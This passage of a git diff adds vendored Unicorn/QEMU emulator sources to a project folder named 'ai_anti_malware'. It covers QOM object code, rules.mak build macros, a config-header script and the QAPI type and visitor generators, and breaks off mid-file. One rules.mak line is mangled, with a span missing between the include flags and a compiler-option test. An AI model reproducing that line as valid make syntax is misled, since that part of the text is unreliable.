object_property_find(obj, name, errp); + if (!op) { + return; + } + + g_free(op->description); + op->description = g_strdup(description); +} + +static void object_instance_init(struct uc_struct *uc, Object *obj, void *opaque) +{ + object_property_add_str(obj, "type", qdev_get_type, NULL, NULL); +} + +void register_types_object(struct uc_struct *uc) +{ + static TypeInfo interface_info = { + TYPE_INTERFACE, // name + NULL, + + sizeof(InterfaceClass), // class_size + 0, + NULL, + + NULL, + NULL, + NULL, + + NULL, + + NULL, + NULL, + NULL, + + true, // abstract + }; + + static TypeInfo object_info = { + TYPE_OBJECT, + NULL, + + 0, + sizeof(Object), + NULL, + + object_instance_init, + NULL, + NULL, + + NULL, + + NULL, + NULL, + NULL, + + true, + }; + + uc->type_interface = type_register_internal(uc, &interface_info); + type_register_internal(uc, &object_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c new file mode 100644 index 0000000..f1579ff --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/qom-qobject.c @@ -0,0 +1,44 @@ +/* + * QEMU Object Model - QObject wrappers + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "qemu-common.h" +#include "qom/object.h" +#include "qom/qom-qobject.h" +#include "qapi/visitor.h" +#include "qapi/qmp-input-visitor.h" +#include "qapi/qmp-output-visitor.h" + +void object_property_set_qobject(struct uc_struct *uc, Object *obj, QObject *value, + const char *name, Error **errp) +{ + QmpInputVisitor *mi; + mi = qmp_input_visitor_new(value); + object_property_set(uc, obj, qmp_input_get_visitor(mi), name, errp); // qq + + qmp_input_visitor_cleanup(mi); +} + +QObject *object_property_get_qobject(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + QObject *ret = NULL; + Error *local_err = NULL; + QmpOutputVisitor *mo; + + mo = qmp_output_visitor_new(); + object_property_get(uc, obj, qmp_output_get_visitor(mo), name, &local_err); + if (!local_err) { + ret = qmp_output_get_qobject(mo); + } + error_propagate(errp, local_err); + qmp_output_visitor_cleanup(mo); + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak new file mode 100644 index 0000000..d4144b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/rules.mak @@ -0,0 +1,361 @@ + +# Don't use implicit rules or variables +# we have explicit rules for everything +MAKEFLAGS += -rR + +# Files with this suffixes are final, don't try to generate them +# using implicit rules +%.d: +%.h: +%.c: +%.cc: +%.cpp: +%.m: +%.mak: + +# Flags for dependency generation +QEMU_DGFLAGS += -MMD -MP -MT $@ -MF $(*D)/$(*F).d + +# Same as -I$(SRC_PATH) -I., but for the nested source/object directories +QEMU_INCLUDES += -I$(/dev/null 2>&1 && echo OK), $2, $3) + +VPATH_SUFFIXES = %.c %.h %.S %.cc %.cpp %.m %.mak %.texi %.sh %.rc +set-vpath = $(if $1,$(foreach PATTERN,$(VPATH_SUFFIXES),$(eval vpath $(PATTERN) $1))) + +# install-prog list, dir +define install-prog + $(INSTALL_DIR) "$2" + $(INSTALL_PROG) $1 "$2" + $(if $(STRIP),$(STRIP) $(foreach T,$1,"$2/$(notdir $T)"),) +endef + +# find-in-path +# Usage: $(call find-in-path, prog) +# Looks in the PATH if the argument contains no slash, else only considers one +# specific directory. Returns an # empty string if the program doesn't exist +# there. +find-in-path = $(if $(find-string /, $1), \ + $(wildcard $1), \ + $(wildcard $(patsubst %, %/$1, $(subst :, ,$(PATH))))) + +# Logical functions (for operating on y/n values like CONFIG_FOO vars) +# Inputs to these must be either "y" (true) or "n" or "" (both false) +# Output is always either "y" or "n". +# Usage: $(call land,$(CONFIG_FOO),$(CONFIG_BAR)) +# Logical NOT +lnot = $(if $(subst n,,$1),n,y) +# Logical AND +land = $(if $(findstring yy,$1$2),y,n) +# Logical OR +lor = $(if $(findstring y,$1$2),y,n) +# Logical XOR (note that this is the inverse of leqv) +lxor = $(if $(filter $(call lnot,$1),$(call lnot,$2)),n,y) +# Logical equivalence (note that leqv "","n" is true) +leqv = $(if $(filter $(call lnot,$1),$(call lnot,$2)),y,n) +# Logical if: like make's $(if) but with an leqv-like test +lif = $(if $(subst n,,$1),$2,$3) + +# String testing functions: inputs to these can be any string; +# the output is always either "y" or "n". Leading and trailing whitespace +# is ignored when comparing strings. +# String equality +eq = $(if $(subst $2,,$1)$(subst $1,,$2),n,y) +# String inequality +ne = $(if $(subst $2,,$1)$(subst $1,,$2),y,n) +# Emptiness/non-emptiness tests: +isempty = $(if $1,n,y) +notempty = $(if $1,y,n) + +# Generate files with tracetool +TRACETOOL=$(PYTHON) $(SRC_PATH)/scripts/tracetool.py + +# Generate timestamp files for .h include files + +config-%.h: config-%.h-timestamp + @cmp $< $@ >/dev/null 2>&1 || cp $< $@ + +config-%.h-timestamp: config-%.mak + $(call quiet-command, sh $(SRC_PATH)/scripts/create_config < $< > $@, " GEN $(TARGET_DIR)config-$*.h") + +.PHONY: clean-timestamp +clean-timestamp: + rm -f *.timestamp +clean: clean-timestamp + +# will delete the target of a rule if commands exit with a nonzero exit status +.DELETE_ON_ERROR: + +# save-vars +# Usage: $(call save-vars, vars) +# Save each variable $v in $vars as save-vars-$v, save their object's +# variables, then clear $v. +define save-vars + $(foreach v,$1, + $(eval save-vars-$v := $(value $v)) + $(foreach o,$($v), + $(foreach k,cflags libs objs, + $(if $($o-$k), + $(eval save-vars-$o-$k := $($o-$k)) + $(eval $o-$k := )))) + $(eval $v := )) +endef + +# load-vars +# Usage: $(call load-vars, vars, add_var) +# Load the saved value for each variable in @vars, and the per object +# variables. +# Append @add_var's current value to the loaded value. +define load-vars + $(eval $2-new-value := $(value $2)) + $(foreach v,$1, + $(eval $v := $(value save-vars-$v)) + $(foreach o,$($v), + $(foreach k,cflags libs objs, + $(if $(save-vars-$o-$k), + $(eval $o-$k := $(save-vars-$o-$k)) + $(eval save-vars-$o-$k := )))) + $(eval save-vars-$v := )) + $(eval $2 := $(value $2) $($2-new-value)) +endef + +# fix-paths +# Usage: $(call fix-paths, obj_path, src_path, vars) +# Add prefix @obj_path to all objects in @vars, and add prefix @src_path to all +# directories in @vars. +define fix-paths + $(foreach v,$3, + $(foreach o,$($v), + $(if $($o-libs), + $(eval $1$o-libs := $($o-libs))) + $(if $($o-cflags), + $(eval $1$o-cflags := $($o-cflags))) + $(if $($o-objs), + $(eval $1$o-objs := $(addprefix $1,$($o-objs))))) + $(eval $v := $(addprefix $1,$(filter-out %/,$($v))) \ + $(addprefix $2,$(filter %/,$($v))))) +endef + +# unnest-var-recursive +# Usage: $(call unnest-var-recursive, obj_prefix, vars, var) +# +# Unnest @var by including subdir Makefile.objs, while protect others in @vars +# unchanged. +# +# @obj_prefix is the starting point of object path prefix. +# +define unnest-var-recursive + $(eval dirs := $(sort $(filter %/,$($3)))) + $(eval $3 := $(filter-out %/,$($3))) + $(foreach d,$(dirs:%/=%), + $(call save-vars,$2) + $(eval obj := $(if $1,$1/)$d) + $(eval -include $(SRC_PATH)/$d/Makefile.objs) + $(call fix-paths,$(if $1,$1/)$d/,$d/,$2) + $(call load-vars,$2,$3) + $(call unnest-var-recursive,$1,$2,$3)) +endef + +# unnest-vars +# Usage: $(call unnest-vars, obj_prefix, vars) +# +# @obj_prefix: object path prefix, can be empty, or '..', etc. Don't include +# ending '/'. +# +# @vars: the list of variable names to unnest. +# +# This macro will scan subdirectories's Makefile.objs, include them, to build +# up each variable listed in @vars. +# +# Per object and per module cflags and libs are saved with relative path fixed +# as well, those variables include -libs, -cflags and -objs. Items in -objs are +# also fixed to relative path against SRC_PATH plus the prefix @obj_prefix. +# +# All nested variables postfixed by -m in names are treated as DSO variables, +# and will be built as modules, if enabled. +# +# A simple example of the unnest: +# +# obj_prefix = .. +# vars = hot cold +# hot = fire.o sun.o season/ +# cold = snow.o water/ season/ +# +# Unnest through a faked source directory structure: +# +# SRC_PATH +# ├── water +# │ └── Makefile.objs──────────────────┐ +# │ │ hot += steam.o │ +# │ │ cold += ice.mo │ +# │ │ ice.mo-libs := -licemaker │ +# │ │ ice.mo-objs := ice1.o ice2.o │ +# │ └──────────────────────────────┘ +# │ +# └── season +# └── Makefile.objs──────┐ +# │ hot += summer.o │ +# │ cold += winter.o │ +# └──────────────────┘ +# +# In the end, the result will be: +# +# hot = ../fire.o ../sun.o ../season/summer.o +# cold = ../snow.o ../water/ice.mo ../season/winter.o +# ../water/ice.mo-libs = -licemaker +# ../water/ice.mo-objs = ../water/ice1.o ../water/ice2.o +# +# Note that 'hot' didn't include 'season/' in the input, so 'summer.o' is not +# included. +# +define unnest-vars + # In the case of target build (i.e. $1 == ..), fix path for top level + # Makefile.objs objects + $(if $1,$(call fix-paths,$1/,,$2)) + + # Descend and include every subdir Makefile.objs + $(foreach v, $2, $(call unnest-var-recursive,$1,$2,$v)) + + $(foreach v,$(filter %-m,$2), + # All .o found in *-m variables are single object modules, create .mo + # for them + $(foreach o,$(filter %.o,$($v)), + $(eval $(o:%.o=%.mo)-objs := $o)) + # Now unify .o in -m variable to .mo + $(eval $v := $($v:%.o=%.mo)) + $(eval modules-m += $($v)) + + # For module build, build shared libraries during "make modules" + # For non-module build, add -m to -y + $(if $(CONFIG_MODULES), + $(foreach o,$($v), + $(eval $o: $($o-objs))) + $(eval $(patsubst %-m,%-y,$v) += $($v)) + $(eval modules: $($v:%.mo=%$(DSOSUF))), + $(eval $(patsubst %-m,%-y,$v) += $(call expand-objs, $($v))))) + + # Post-process all the unnested vars + $(foreach v,$2, + $(foreach o, $(filter %.mo,$($v)), + # Find all the .mo objects in variables and add dependency rules + # according to .mo-objs. Report error if not set + $(if $($o-objs), + $(eval $(o:%.mo=%$(DSOSUF)): module-common.o $($o-objs)), + $(error $o added in $v but $o-objs is not set)) + # Pass the .mo-cflags and .mo-libs along to member objects + $(foreach p,$($o-objs), + $(if $($o-cflags), $(eval $p-cflags += $($o-cflags))) + $(if $($o-libs), $(eval $p-libs += $($o-libs))))) + $(shell mkdir -p ./ $(sort $(dir $($v)))) + # Include all the .d files + $(eval -include $(addsuffix *.d, $(sort $(dir $($v))))) + $(eval $v := $(filter-out %/,$($v)))) + + # For all %.mo objects that are directly added into -y, expand them to %.mo-objs + $(foreach v,$2, + $(eval $v := $(foreach o,$($v),$(if $($o-objs),$($o-objs),$o)))) + +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config new file mode 100644 index 0000000..a286002 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/create_config @@ -0,0 +1,76 @@ +#!/bin/sh + +echo "/* Automatically generated by create_config - do not modify */" + +while read line; do + +case $line in + qemu_*dir=*) # qemu-specific directory configuration + name=${line%=*} + value=${line#*=} + define_name=`echo $name | LC_ALL=C tr '[a-z]' '[A-Z]'` + eval "define_value=\"$value\"" + echo "#define CONFIG_$define_name \"$define_value\"" + # save for the next definitions + eval "$name=\$define_value" + ;; + prefix=*) + # save for the next definitions + prefix=${line#*=} + ;; + CONFIG_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + CONFIG_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo "#define $name $value" + ;; + ARCH=*) # configuration + arch=${line#*=} + arch_name=`echo $arch | LC_ALL=C tr '[a-z]' '[A-Z]'` + echo "#define HOST_$arch_name 1" + ;; + HOST_CC=*) + # do nothing + ;; + HOST_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + HOST_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo "#define $name $value" + ;; + TARGET_BASE_ARCH=*) # configuration + target_base_arch=${line#*=} + base_arch_name=`echo $target_base_arch | LC_ALL=C tr '[a-z]' '[A-Z]'` + echo "#define TARGET_$base_arch_name 1" + ;; + TARGET_XML_FILES=*) + # do nothing + ;; + TARGET_ABI_DIR=*) + # do nothing + ;; + TARGET_NAME=*) + target_name=${line#*=} + echo "#define TARGET_NAME \"$target_name\"" + ;; + TARGET_DIRS=*) + # do nothing + ;; + TARGET_*=y) # configuration + name=${line%=*} + echo "#define $name 1" + ;; + TARGET_*=*) # configuration + name=${line%=*} + value=${line#*=} + echo "#define $name $value" + ;; +esac + +done # read diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py new file mode 100644 index 0000000..f103954 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/ordereddict.py @@ -0,0 +1,132 @@ +# Copyright (c) 2009 Raymond Hettinger +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation files +# (the "Software"), to deal in the Software without restriction, +# including without limitation the rights to use, copy, modify, merge, +# publish, distribute, sublicense, and/or sell copies of the Software, +# and to permit persons to whom the Software is furnished to do so, +# subject to the following conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. + +try: + from UserDict import UserDict + from UserDict import DictMixin +except ImportError: + from collections import UserDict + try: + from collections import MutableMapping as DictMixin + except ImportError: + from collections.abc import MutableMapping as DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.__map = {} # key --> [key, prev, next] + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = reversed(self).next() + else: + key = iter(self).next() + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, self.items()) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + if len(self) != len(other): + return False + for p, q in zip(self.items(), other.items()): + if p != q: + return False + return True + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh new file mode 100644 index 0000000..0cf5502 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-build.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +# Run this scripts to create qapi below files in root dir +# ../qapi-types.c +# ../qapi-types.h +# ../qapi-visit.c +# ../qapi-visit.h + +python qapi-types.py -h -o .. -b -i qapi-schema.json +python qapi-types.py -c -o .. -b -i qapi-schema.json + +python qapi-visit.py -h -o .. -b -i qapi-schema.json +python qapi-visit.py -c -o .. -b -i qapi-schema.json + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json new file mode 100644 index 0000000..37e5315 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-schema.json @@ -0,0 +1,39 @@ +# -*- Mode: Python -*- +# +# QAPI Schema + +# QAPI common definitions +{ 'include': 'qapi/common.json' } + +## +# @X86CPURegister32 +# +# A X86 32-bit register +# +# Since: 1.5 +## +{ 'enum': 'X86CPURegister32', + 'data': [ 'EAX', 'EBX', 'ECX', 'EDX', 'ESP', 'EBP', 'ESI', 'EDI' ] } + +## +# @X86CPUFeatureWordInfo +# +# Information about a X86 CPU feature word +# +# @cpuid-input-eax: Input EAX value for CPUID instruction for that feature word +# +# @cpuid-input-ecx: #optional Input ECX value for CPUID instruction for that +# feature word +# +# @cpuid-register: Output register containing the feature bits +# +# @features: value of output register, containing the feature bits +# +# Since: 1.5 +## +{ 'type': 'X86CPUFeatureWordInfo', + 'data': { 'cpuid-input-eax': 'int', + '*cpuid-input-ecx': 'int', + 'cpuid-register': 'X86CPURegister32', + 'features': 'int' } } + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py new file mode 100644 index 0000000..7b06085 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-types.py @@ -0,0 +1,464 @@ +# +# QAPI types generator +# +# Copyright IBM, Corp. 2011 +# +# Authors: +# Anthony Liguori +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. + +from ordereddict import OrderedDict +from qapi import * +import sys +import os +import getopt +import errno + +def generate_fwd_struct(name, members, builtin_type=False): + if builtin_type: + return mcgen(''' + +typedef struct %(name)sList +{ + union { + %(type)s value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + type=c_type(name), + name=name) + + return mcgen(''' + +typedef struct %(name)s %(name)s; + +typedef struct %(name)sList +{ + union { + %(name)s *value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + name=name) + +def generate_fwd_enum_struct(name, members): + return mcgen(''' +typedef struct %(name)sList +{ + union { + %(name)s value; + uint64_t padding; + }; + struct %(name)sList *next; +} %(name)sList; +''', + name=name) + +def generate_struct_fields(members): + ret = '' + + for argname, argentry, optional, structured in parse_args(members): + if optional: + ret += mcgen(''' + bool has_%(c_name)s; +''', + c_name=c_var(argname)) + if structured: + push_indent() + ret += generate_struct({ "field": argname, "data": argentry}) + pop_indent() + else: + ret += mcgen(''' + %(c_type)s %(c_name)s; +''', + c_type=c_type(argentry), c_name=c_var(argname)) + + return ret + +def generate_struct(expr): + + structname = expr.get('type', "") + fieldname = expr.get('field', "") + members = expr['data'] + base = expr.get('base') + + ret = mcgen(''' +struct %(name)s +{ +''', + name=structname) + + if base: + ret += generate_struct_fields({'base': base}) + + ret += generate_struct_fields(members) + + if len(fieldname): + fieldname = " " + fieldname + ret += mcgen(''' +}%(field)s; +''', + field=fieldname) + + return ret + +def generate_enum_lookup(name, values): + ret = mcgen(''' +const char *%(name)s_lookup[] = { +''', + name=name) + i = 0 + for value in values: + ret += mcgen(''' + "%(value)s", +''', + value=value) + + ret += mcgen(''' + NULL, +}; + +''') + return ret + +def generate_enum(name, values): + lookup_decl = mcgen(''' +extern const char *%(name)s_lookup[]; +''', + name=name) + + enum_decl = mcgen(''' +typedef enum %(name)s +{ +''', + name=name) + + # append automatically generated _MAX value + enum_values = values + [ 'MAX' ] + + i = 0 + for value in enum_values: + enum_full_value = generate_enum_full_value(name, value) + enum_decl += mcgen(''' + %(enum_full_value)s = %(i)d, +''', + enum_full_value = enum_full_value, + i=i) + i += 1 + + enum_decl += mcgen(''' +} %(name)s; +''', + name=name) + + return lookup_decl + enum_decl + +def generate_anon_union_qtypes(expr): + + name = expr['union'] + members = expr['data'] + + ret = mcgen(''' +const int %(name)s_qtypes[QTYPE_MAX] = { +''', + name=name) + + for key in members: + qapi_type = members[key] + if qapi_type in builtin_type_qtypes: + qtype = builtin_type_qtypes[qapi_type] + elif find_struct(qapi_type): + qtype = "QTYPE_QDICT" + elif find_union(qapi_type): + qtype = "QTYPE_QDICT" + elif find_enum(qapi_type): + qtype = "QTYPE_QSTRING" + else: + assert False, "Invalid anonymous union member" + + ret += mcgen(''' + [ %(qtype)s ] = %(abbrev)s_KIND_%(enum)s, +''', + qtype = qtype, + abbrev = de_camel_case(name).upper(), + enum = c_fun(de_camel_case(key),False).upper()) + + ret += mcgen(''' +}; +''') + return ret + + +def generate_union(expr): + + name = expr['union'] + typeinfo = expr['data'] + + base = expr.get('base') + discriminator = expr.get('discriminator') + + enum_define = discriminator_find_enum_define(expr) + if enum_define: + discriminator_type_name = enum_define['enum_name'] + else: + discriminator_type_name = '%sKind' % (name) + + ret = mcgen(''' +struct %(name)s +{ + %(discriminator_type_name)s kind; + union { + void *data; +''', + name=name, + discriminator_type_name=discriminator_type_name) + + for key in typeinfo: + ret += mcgen(''' + %(c_type)s %(c_name)s; +''', + c_type=c_type(typeinfo[key]), + c_name=c_fun(key)) + + ret += mcgen(''' + }; +''') + + if base: + base_fields = find_struct(base)['data'] + if discriminator: + base_fields = base_fields.copy() + del base_fields[discriminator] + ret += generate_struct_fields(base_fields) + else: + assert not discriminator + + ret += mcgen(''' +}; +''') + if discriminator == {}: + ret += mcgen(''' +extern const int %(name)s_qtypes[]; +''', + name=name) + + + return ret + +def generate_type_cleanup_decl(name): + ret = mcgen(''' +void qapi_free_%(type)s(%(c_type)s obj); +''', + c_type=c_type(name),type=name) + return ret + +def generate_type_cleanup(name): + ret = mcgen(''' + +void qapi_free_%(type)s(%(c_type)s obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_%(type)s(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} +''', + c_type=c_type(name),type=name) + return ret + + +try: + opts, args = getopt.gnu_getopt(sys.argv[1:], "chbp:i:o:", + ["source", "header", "builtins", + "prefix=", "input-file=", "output-dir="]) +except getopt.GetoptError as err: + print(str(err)) + sys.exit(1) + +output_dir = "" +input_file = "" +prefix = "" +c_file = 'qapi-types.c' +h_file = 'qapi-types.h' + +do_c = False +do_h = False +do_builtins = False + +for o, a in opts: + if o in ("-p", "--prefix"): + prefix = a + elif o in ("-i", "--input-file"): + input_file = a + elif o in ("-o", "--output-dir"): + output_dir = a + "/" + elif o in ("-c", "--source"): + do_c = True + elif o in ("-h", "--header"): + do_h = True + elif o in ("-b", "--builtins"): + do_builtins = True + +if not do_c and not do_h: + do_c = True + do_h = True + +c_file = output_dir + prefix + c_file +h_file = output_dir + prefix + h_file + +try: + os.makedirs(output_dir) +except os.error as e: + if e.errno != errno.EEXIST: + raise + +def maybe_open(really, name, opt): + if really: + return open(name, opt) + else: + try: + import StringIO + return StringIO.StringIO() + except ImportError: + from io import StringIO + return StringIO() + +fdef = maybe_open(do_c, c_file, 'w') +fdecl = maybe_open(do_h, h_file, 'w') + +fdef.write(mcgen(''' +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "%(prefix)sqapi-types.h" +#include "%(prefix)sqapi-visit.h" + +''', prefix=prefix)) + +fdecl.write(mcgen(''' +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef %(guard)s +#define %(guard)s + +#include "unicorn/platform.h" + +''', + guard=guardname(h_file))) + +exprs = parse_schema(input_file) +exprs = filter(lambda expr: 'gen' not in expr, exprs) +exprs = list(exprs) + +fdecl.write(guardstart("QAPI_TYPES_BUILTIN_STRUCT_DECL")) +for typename in builtin_types: + fdecl.write(generate_fwd_struct(typename, None, builtin_type=True)) +fdecl.write(guardend("QAPI_TYPES_BUILTIN_STRUCT_DECL")) + +for expr in exprs: + ret = "\n" + if 'type' in expr: + ret += generate_fwd_struct(expr['type'], expr['data']) + elif 'enum' in expr: + ret += generate_enum(expr['enum'], expr['data']) + "\n" + ret += generate_fwd_enum_struct(expr['enum'], expr['data']) + fdef.write(generate_enum_lookup(expr['enum'], expr['data'])) + elif 'union' in expr: + ret += generate_fwd_struct(expr['union'], expr['data']) + "\n" + enum_define = discriminator_find_enum_define(expr) + if not enum_define: + ret += generate_enum('%sKind' % expr['union'], expr['data'].keys()) + fdef.write(generate_enum_lookup('%sKind' % expr['union'], + expr['data'].keys())) + if expr.get('discriminator') == {}: + fdef.write(generate_anon_union_qtypes(expr)) + else: + continue + fdecl.write(ret) + +# to avoid header dependency hell, we always generate declarations +# for built-in types in our header files and simply guard them +fdecl.write(guardstart("QAPI_TYPES_BUILTIN_CLEANUP_DECL")) +for typename in builtin_types: + fdecl.write(generate_type_cleanup_decl(typename + "List")) +fdecl.write(guardend("QAPI_TYPES_BUILTIN_CLEANUP_DECL")) + +# ...this doesn't work for cases where we link in multiple objects that +# have the functions defined, so we use -b option to provide control +# over these cases +if do_builtins: + fdef.write(guardstart("QAPI_TYPES_BUILTIN_CLEANUP_DEF")) + for typename in builtin_types: + fdef.write(generate_type_cleanup(typename + "List")) + fdef.write(guardend("QAPI_TYPES_BUILTIN_CLEANUP_DEF")) + +for expr in exprs: + ret = "\n" + if 'type' in expr: + ret += generate_struct(expr) + "\n" + ret += generate_type_cleanup_decl(expr['type'] + "List") + fdef.write(generate_type_cleanup(expr['type'] + "List") + "\n") + ret += generate_type_cleanup_decl(expr['type']) + fdef.write(generate_type_cleanup(expr['type']) + "\n") + elif 'union' in expr: + ret += generate_union(expr) + ret += generate_type_cleanup_decl(expr['union'] + "List") + fdef.write(generate_type_cleanup(expr['union'] + "List") + "\n") + ret += generate_type_cleanup_decl(expr['union']) + fdef.write(generate_type_cleanup(expr['union']) + "\n") + elif 'enum' in expr: + ret += generate_type_cleanup_decl(expr['enum'] + "List") + fdef.write(generate_type_cleanup(expr['enum'] + "List") + "\n") + else: + continue + fdecl.write(ret) + +fdecl.write(''' +#endif +''') + +fdecl.flush() +fdecl.close() + +fdef.flush() +fdef.close() diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py new file mode 100644 index 0000000..beb5af5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi-visit.py @@ -0,0 +1,597 @@ +# +# QAPI visitor generator +# +# Copyright IBM, Corp. 2011 +# Copyright (C) 2014 Red Hat, Inc. +# +# Authors: +# Anthony Liguori +# Michael Roth +# Markus Armbruster +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. + +from ordereddict import OrderedDict +from qapi import * +import re +import sys +import os +import getopt +import errno + +implicit_structs = [] + +def generate_visit_implicit_struct(type): + global implicit_structs + if type in implicit_structs: + return '' + implicit_structs.append(type) + return mcgen(''' + +static void visit_type_implicit_%(c_type)s(Visitor *m, %(c_type)s **obj, Error **errp) +{ + Error *err = NULL; + + visit_start_implicit_struct(m, (void **)obj, sizeof(%(c_type)s), &err); + if (!err) { + visit_type_%(c_type)s_fields(m, obj, errp); + visit_end_implicit_struct(m, &err); + } + error_propagate(errp, err); +} +''', + c_type=type_name(type)) + +def generate_visit_struct_fields(name, field_prefix, fn_prefix, members, base = None): + substructs = [] + ret = '' + if not fn_prefix: + full_name = name + else: + full_name = "%s_%s" % (name, fn_prefix) + + for argname, argentry, optional, structured in parse_args(members): + if structured: + if not fn_prefix: + nested_fn_prefix = argname + else: + nested_fn_prefix = "%s_%s" % (fn_prefix, argname) + + nested_field_prefix = "%s%s." % (field_prefix, argname) + ret += generate_visit_struct_fields(name, nested_field_prefix, + nested_fn_prefix, argentry) + ret += mcgen(''' + +static void visit_type_%(full_name)s_field_%(c_name)s(Visitor *m, %(name)s **obj, Error **errp) +{ +''', + name=name, full_name=full_name, c_name=c_var(argname)) + ret += generate_visit_struct_body(full_name, argname, argentry) + ret += mcgen(''' +} +''') + + if base: + ret += generate_visit_implicit_struct(base) + + ret += mcgen(''' + +static void visit_type_%(full_name)s_fields(Visitor *m, %(name)s **obj, Error **errp) +{ + Error *err = NULL; +''', + name=name, full_name=full_name) + push_indent() + + if base: + ret += mcgen(''' +visit_type_implicit_%(type)s(m, &(*obj)->%(c_prefix)s%(c_name)s, &err); +if (err) { + goto out; +} +''', + c_prefix=c_var(field_prefix), + type=type_name(base), c_name=c_var('base')) + + for argname, argentry, optional, structured in parse_args(members): + if optional: + ret += mcgen(''' +visit_optional(m, 